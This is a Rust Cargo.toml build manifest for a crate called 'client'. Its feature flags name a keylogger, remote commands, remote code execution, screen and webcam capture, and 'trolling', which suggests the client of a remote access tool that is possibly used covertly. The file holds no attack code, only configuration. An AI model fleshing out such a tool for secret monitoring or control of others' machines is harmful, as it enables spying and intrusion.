[package]
name = "client"
version = "0.1.0"
edition = "2024"


[profile.release]
strip = true      #deletes debuginfo
lto = true        # can change code structure,
codegen-units = 1 # more aggressive optimizations
panic = "abort"   #no info when panicking

[features]
default = ["dev-logs","remote_cmd", "files", "chat"]

dev-logs = []
audio = []
files = []
remote_screen = []
remote_cmd = []
task_manager = []
webcam = []
chat = []
keylogger = []
remote_code_execution= []
trolling = []

[dependencies]
tokio = { version = "1.39.1", features = ["full"] }
tokio-tungstenite = { version = "0.23.0", features = [
    "rustls-tls-native-roots",
] }


sysinfo = "0.31.2"
url = "2.5.2"
serde = { version = "1.0.219", features = ["derive"] }
serde_json = "1.0.140"

# lazy rust libs
futures-util = { version = "0.3.30", features = ["sink"] }
async-trait = "0.1.88"
async-recursion = "1.1.1"
lazy_static = "1.5.0"
anyhow = "1.0.98"

# process images
image = "0.25.6"

# image capture
nokhwa = { version = "0.10.9", features = ["input-native"] }
scap = { git = "https://github.com/hagz0r/scap", branch = "windows-capture-fix-merge-pls" }

# gui
egui = "0.32.0"
eframe = "0.32.0"
winit = { version = "0.30.11", default-features = false, features = [
    "x11",
    "wayland",
] }

rustls = { version = "0.23", default-features = false, features = ["logging"] }
rustls-native-certs = "0.7"
rustls-pemfile = "2.1"
webpki-roots = "0.26"
ring = "0.17"
x509-parser = "0.15"
base64 = "0.22.1"
futures = "0.3.31"
